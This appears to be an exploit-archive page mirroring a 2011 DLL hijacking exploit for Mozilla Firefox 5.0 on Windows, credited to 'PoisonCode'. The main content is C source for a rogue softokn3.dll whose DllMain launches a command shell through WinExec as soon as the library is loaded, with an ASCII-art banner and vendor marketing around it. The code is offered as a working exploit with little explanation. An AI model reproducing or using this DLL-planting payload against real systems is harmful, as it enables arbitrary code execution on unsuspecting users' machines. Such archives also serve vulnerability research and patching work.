Lucene search
K

Mozilla Firefox 5.0 DLL Hijacking Exploit(softokn3.dll)

🗓️ 23 Jun 2011 00:00:00Reported by PoisonCodeType 
zdt
 zdt
🔗 0day.today👁 14 Views

Mozilla Firefox 5.0 DLL Hijacking Exploit(softokn3.dll) on Window

Code
# Title: Mozilla Firefox 5.0 DLL Hijacking Exploit(softokn3.dll)
# Software:www.mozilla-europe.org/es/
# Version: 5.0
# Tested on: Windows
# Author: PoisonCode
# Published: 2011-06-23
# CVE-ID:()

_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>

int PS()
{

  WinExec("cmd", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  PS();
  return 0;
}



#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation